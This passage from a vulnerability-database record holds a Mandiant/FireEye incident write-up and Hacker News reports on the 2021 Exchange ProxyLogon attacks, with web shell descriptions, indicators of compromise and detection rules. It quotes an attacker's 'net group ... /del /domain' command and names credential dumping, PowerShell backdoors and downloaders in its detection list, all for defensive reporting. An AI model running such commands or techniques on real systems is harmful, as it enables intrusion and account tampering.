UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistent mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Note** \n \n---|---|--- \n \n165.232.154.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/02 02:43 \n \n182.18.152.105\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 16:16 \n \n##### UNC2640\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5** \n \n---|---|--- \n \nhelp.aspx\n\n| \n\nFile: Web shell\n\n| \n\n4b3039cf227c611c45d2242d1228a121 \n \niisstart.aspx\n\n| \n\nFile: Web shell\n\n| \n\n0fd9bffa49c76ee12e51e3b8ae0609ac \n \n##### UNC2643\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5/Note** \n \n---|---|--- \n \nCobalt Strike BEACON\n\n| \n\nFile: Shellcode\n\n| \n\n79eb217578bed4c250803bd573b10151 \n \n89.34.111.11\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:06 \n \n86.105.18.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:39 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| \n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. \n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-jpxSsQOpxfA/YFBKGEa4SeI/AAAAAAAACCU/KSoqbip59LE-7trSUlqLbRehavtGqXdwwCLcBGAsYHQ/s0/microsoft-azure-hacking-1.jpg>)\n\nMicrosoft on Monday released a one-click mitigation software that applies all the necessary countermeasures to secure vulnerable environments against the ongoing widespread [ProxyLogon Exchange Server](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) cyberattacks.\n\nCalled Exchange On-premises Mitigation Tool ([EOMT](<https://github.com/microsoft/CSS-Exchange/tree/main/Security#exchange-on-premises-mitigation-tool-eomt>)), the PowerShell-based script serves to mitigate against current known attacks using CVE-2021-26855, scan the Exchange Server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) for any deployed web shells, and attempt to remediate the detected compromises.\n\n\"This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe development comes in the wake of indiscriminate attacks against unpatched Exchange Servers across the world by more than ten advanced persistent threat actors \u2014 most of the government-backed cyberespionage groups \u2014 to plant backdoors, coin miners, and [ransomware](<https://thehackernews.com/2021/03/icrosoft-exchange-ransomware.html>), with the release of [proof-of-concept](<https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html>) (PoC) fueling the hacking spree even further.\n\nBased on telemetry from [RiskIQ](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/>), 317,269 out of 400,000 on-premises Exchange Servers globally have been patched as of March 12, with the U.S., Germany, Great Britain, France, and Italy leading the countries with vulnerable servers. \n\nAdditionally, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has [updated](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) its guidance to detail as many as seven variants of the [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>) web shell that are being leveraged by malicious actors. \n\n[](<https://thehackernews.com/images/-KZiEV9wW7ew/YFBKIQY5ALI/AAAAAAAACCY/O_PgoFnkilgx5kMQCGC_LSY6EhsjeHPigCLcBGAsYHQ/s0/microsoft-exchange-security.jpg>)\n\nTaking up just four kilobytes, the web shell has been a popular [post-exploitation tool](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) of choice for cyber attackers for nearly a decade.\n\nWhile the breadth of the intrusions is being assessed, Microsoft is also reportedly investigating how the \"limited and targeted\" attacks it detected in early January picked up steam to quickly morph into a widespread mass exploitation campaign, forcing it to release the security fixes a week before it was due.\n\nThe Wall Street Journal on Friday [reported](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>) that investigators are focused on whether a Microsoft partner, with whom the company shared information about the vulnerabilities through its Microsoft Active Protections Program ([MAPP](<https://www.microsoft.com/en-us/msrc/mapp>)), either accidentally or purposefully leaked it to other groups.\n\nIt is also being claimed that some tools used in the \"second wave\" of attacks towards the end of February are similar to proof-of-concept attack code that Microsoft shared with antivirus companies and other security partners on February 23, raising the possibility that threat actors may have gotten their hands on private disclosure that Microsoft shared with its security partners.\n\nThe other theory is that the threat actors independently discovered the same set of vulnerabilities, which were then exploited to stealthily conduct reconnaissance of target networks and steal mailboxes, before ramping up the attacks once the hackers figured out Microsoft was readying a patch.\n\n\"This is the [second time](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) in the last four months that nation-state actors have engaged in cyberattacks with the potential to affect businesses and organizations of all sizes,\" Microsoft [said](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>). \"While this began as a nation-state attack, the vulnerabilities are being exploited by other criminal organizations, including new ransomware attacks, with the potential for other malicious activities.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T06:06:00", "type": "thn", "title": "Use This One-Click Mitigation Tool from Microsoft to Prevent Exchange Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-16T10:01:21", "id": "THN:814DFC4A310E0C39823F3110B0457F8C", "href": "https://thehackernews.com/2021/03/use-this-one-click-mitigation-tool-from.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T03:57:39", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1PBy6f30rb04dAbZTbbnNt_W5SsZO3lhS31ENdnsfmrEYox9AZqd9kkYEBWsIV7uSrZP9dAtk2CeSdHT11tl2O5v7j6aazExHwKgOa9cUjnDFSksGKSSYBaP63LbQXnlo9FAJRw0Bswxnf-qcDJqylBF-wVoy4-FvQFO7TgmdBsXrkgBd8kpl5jet/s728-e100/ics.jpg>)\n\nEntities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware.\n\nRussian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, [attributed](<https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/>) it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors.\n\n\"During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated [building automation 